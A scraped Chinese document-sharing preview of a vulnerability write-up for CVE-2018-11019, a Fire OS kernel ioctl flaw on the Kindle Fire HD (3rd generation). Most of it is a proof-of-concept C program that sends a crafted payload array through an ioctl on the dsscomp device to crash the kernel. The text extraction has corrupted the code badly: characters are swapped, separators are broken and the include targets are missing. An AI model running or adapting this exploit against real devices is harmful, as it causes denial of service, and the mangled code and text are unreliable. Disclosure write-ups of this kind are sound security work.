(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
《(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(10页珍藏版)》请在第一文库网上搜索。
1、(CVE-2018-11019)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)是美国亚马逊(AmaZOn)公司的一款FireOS平板电脑设备。FireOS是运行在其中的一套专用于AmaZOn设备的基于Android开发的移动操作系统。kerne1是其中的一个内核组件。AmazonKind1eFireHD(3rd)FireOS4.5.5.3版本中的kerne1组件的kerne1/omap/drivers/misc/gcx/gcioct1/gcif.c文件存在安全漏洞。攻击者可借助3221773726命令
2、利用该漏洞注入特制的参数,造成内核崩溃。二、漏洞影响FireOS4.5.5.3三、复现过程poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevdsscompcausesthesystemcrashviaIOCT11118064517.* Re1atedbuggystructnameisdsscomp_setup_dispc_data.* ThisPocshou1drunwithpermissiontodoioct1ondevdsscomp.* The-Fow11wingiskmsgofkerne1cra
3、shinfomation:*/#inc1ude#inc1ude#inc1ude#inc1udeconststaticchar*driver=devdsscomp;staticcommand=1118064517;intmain(intargc,char*argv,char*env)unsignedintpay1oad=Oxffffffffj0X00000003j05d200040,0x79900008,0x8f5928bd,0x78b02422,0X00000000j0ffffffff,0xf4c50400,0007fffff,08499f562,0ffff0400,0001b131dj0x6
4、0818210,0X00000007,0ffffffff,0X000000000x9da9041c,0cd980400,0001f03f4,0x00000007,0x2a34003f,07c80d8f3,0x63102627,0xc73643a8,0xa28f0665,0X00000000j0689e57b4j0x01ff0008,0x5e7324b1,0xae3b003f,0x0b174d86,0X00000400,0x2Iffff37,0xceb367a4j0x00000040,0x00000001j0xec000f9ej000000001,0x00000Iff,0X00000000,00
5、0000000,00000000f00425c069j0x038cc3bej00000000f,0x00000080,0xe5790100,05b1bffff,00000d355,0x0000c685,0xa0070000,00010ffff,0x00a0ff00,000000001,0xff490700j0x0832ad03,0x000000060X00000002,000000001j0x81f871C0,0x738019cbj0xbf47ffff,000000040j0X00000001,x7f190f33,0X00000001,0x8295769b,0X0000003f,0x869f2
6、295,0ffffffffj0xd673914fj0x05055800,0xed69b7d5j0X00000000,0x107ebbd,0xd214af8dj0xffff4a93,0x26450008,0x58df0000j0d16db084j0x03ff30dd,0X00000001,0x209aff3b,0xe7850800j0x00000002,0x30da815cj0x426f5105,00de109d7j02c1a65fcj0fcb3d75f,0X00000000,0X00000001,08066be5b0X00000002,0ffffffffj0x5cf232ecj0x680d14
7、69,0X000000010X00000020,0ffffffff,0X00000400,0xd1d12be8j0X02010200,001ffc16f,0xf6e237e6,0x007f0000,001ff08f8,0000f00f9j0xbad07695,0X00000000j0xbaff0000,0x24040040,0X000000060X00000004,0X00000000,0xbc2e9242,0x009f5f08,0x00800000?0X00000000j000000001,0xff8800ff,0X00000001,0X00000000,0000003f4,0x6faa84
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- CVE-2018-11019Amazon Kindle Fire HD 3rd OS kernel组件安全漏洞 CVE 2018 11019 Amazon rd kernel 组件 安全漏洞
链接地址:https://www.001doc.com/doc/794836.html